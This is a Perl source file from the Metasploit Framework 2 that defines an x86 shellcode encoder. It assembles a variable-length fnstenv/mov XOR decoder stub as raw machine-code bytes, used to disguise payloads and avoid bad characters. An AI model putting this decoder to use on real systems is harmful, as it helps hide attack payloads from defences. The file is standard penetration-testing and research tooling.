Codebase list framework2 / master encoders / PexFnstenvMov.pm
master

Tree @master (Download .tar.gz)

PexFnstenvMov.pm @masterraw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Encoder::PexFnstenvMov;
use strict;
use base 'Msf::Encoder::XorDword';
use Pex::Encoder;
use Pex::x86;

my $advanced = {
};

my $info = {
  'Name'    => 'Pex Variable Length Fnstenv/mov Double Word Xor Encoder',
  'Version' => '$Revision: 1743 $',
  'Authors' => [ 'spoonm <ninjatools [at] hush.com>', ],
  'Arch'    => [ 'x86' ],
  'OS'      => [ ],
  'Description'  =>  'Variable-length fnstenv/mov dword xor encoder',
  'Refs'    => [ ],
};

sub new {
  my $class = shift; 
  return($class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_));
}

sub _GenEncoder {
  my $self = shift;
  my $xor = shift;
  my $len = shift;
  my $badchars = shift;
  my $xorkey = pack('V', $xor);


  # spoon's smaller variable-length fnstenv encoder
  my $decoder =
    Pex::x86::Mov((($len - 1) / 4) + 1, "ecx", $badchars).
    "\xd9\xee".                         # fldz
    "\xd9\x74\x24\xf4".                 # fnstenv [esp - 12]
    "\x5b".                             # pop ebx
    "\x81\x73\x13". $xorkey .           # xor_xor: xor DWORD [ebx + 22], xorkey
    "\x83\xeb\xfc".                     # sub ebx,-4
    "\xe2\xf4";                         # loop xor_xor

  return($decoder);
}

1;